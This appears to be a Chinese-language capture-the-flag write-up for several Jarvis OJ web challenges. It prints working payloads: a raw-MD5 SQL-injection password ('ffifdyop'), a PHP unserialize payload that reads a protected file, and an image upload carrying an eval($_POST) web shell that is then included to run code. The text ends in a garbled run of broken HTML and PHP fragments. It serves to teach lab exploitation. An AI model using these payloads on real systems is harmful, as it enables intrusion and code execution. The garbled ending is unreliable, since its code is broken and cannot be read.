Jarvis OJ Writeup

2023-05-09 14:32:34 浏览数 (2)

PORT 51

代码语言:javascript复制
➜  ~ sudo curl --local-port 51 http://web.jarvisoj.com:32770/
<!DOCTYPE html>
<html>
<head>
<title>Web 100</title>
<style type="text/css">
    body {
    	background:gray;
    	text-align:center;
    }
</style>
</head>
<body>
    <h3>Yeah!! Here's your flag:PCTF{}</h3>	
</body>
</html>

Login

md5

header 头里面发现 hint: “select * from admin where password=’”.md5($pass,true).”‘“

代码语言:javascript复制
md5 ( string $str [, bool $raw_output = FALSE ] ) : string
// raw 为 TRUE 时为 16 字符二进制格式,默认为 false 32 字符十六进制数

搜索一下,发现有个牛逼的字符串: ffifdyop

https://joychou.org/web/SQL-injection-with-raw-MD5-hashes.html

http://www.am0s.com/functions/204.html

传入之后,最终的 sql 语句变为 select * from admin where password=’’or’6�]��!r,��b’

成功闭合,得到万能密码,登录即可。

神盾局的秘密

反序列化

通过 /showimg.php?img=c2hvd2ltZy5waHA= 可读取源码

代码语言:javascript复制
// showing.php
<?php
    $f = $_GET['img'];
    if (!empty($f)) {
    	$f = base64_decode($f);
    	if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE 
    	&& stripos($f,'\')===FALSE	&& stripos($f,'pctf')===FALSE) {
    		readfile($f);
    	} else {
    		echo "File not found!";
    	}
    }
?>

// index.php
<?php 
    require_once('shield.php');
    $x = new Shield();
    isset($_GET['class']) && $g = $_GET['class'];
    if (!empty($g)) {
    	$x = unserialize($g);
    }
    echo $x->readfile();
?>

// shield.php
<?php
    //flag is in pctf.php
    class Shield {
    	public $file;
    	function __construct($filename = '') {
    		$this -> file = $filename;
    	}
    	
    	function readfile() {
    		if (!empty($this->file) && stripos($this->file,'..')===FALSE  
    		&& stripos($this->file,'/')===FALSE && stripos($this->file,'\')==FALSE) {
    			return @file_get_contents($this->file);
    		}
    	}
    }
?>

构造利用的 pop 链即可,payload

代码语言:javascript复制
/index.php?class=O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}

inject

有反引号的注入

详见 https://cloud.tencent.com/developer/article/2283088

Easy Gallery

upload lfi

扫了一遍目录,没发现什么文件,尝试 filter 读源码,也失败了

主题界面是一个图片上传,再加一个展示界面

配置信息给的这么清晰,有点可疑,然而并没有找到什么有用的洞

Apache/2.4.18 (Unix) OpenSSL/1.0.2h PHP/5.6.21 mod_perl/2.0.8-dev Perl/v5.16.3

Warning: fopen(submi.php): failed to open stream: No such file or directory in /opt/lampp/htdocs/index.php on line 24

按理说是可以文件包含,php://filter/read=convert.base64-encode/resource=index

然而显示 Cross domain forbidden!,估计是加了啥子 waf,此路不通

fopen() 时应该是拼接了一个 “.php”,这里可以用 绕过

fopen(index.jj): failed to open stream 绕过成功

图片只能上传 jpg ,所以直接抓包在后面再个一句话,然后用 fopen() 去包含

但是,注意是但是,这里有个坑,不能用 <?php,有 waf,要用 eval($_POST1)

然后 page=uploads/1552805580.jpg 自动出 flag,都不需要菜刀

pass,true)."'"</p> <p>​ md5 ( string _COOKIE"role")) {</p> <p>​ hsh = _COOKIE"hsh";</p> <p>​ if (role==="admin" && $``$salt.strrev( _COOKIE"role"))) {</p> <p>​ auth = false;</p> <p>​ }</p> <p>​ } else {</p> <p>​ s);</p> <p>​ _GET'id') {</p> <p>​ header('Location: index.php?id=1');</p> <p>​ exit();</p> <p>​ }</p> <p>​ a= _GET'a';</p> <p>​ b= _GET'b';</p> <p>​ if(stripos(a,'.')) {</p> <p>​ echo 'Hahahahahaha';</p> <p>​ return ;</p> <p>​ }</p> <p>​ data=="1112 is a nice lab!" and b)>5 </p> <p>​ and eregi("111".substr(

0 人点赞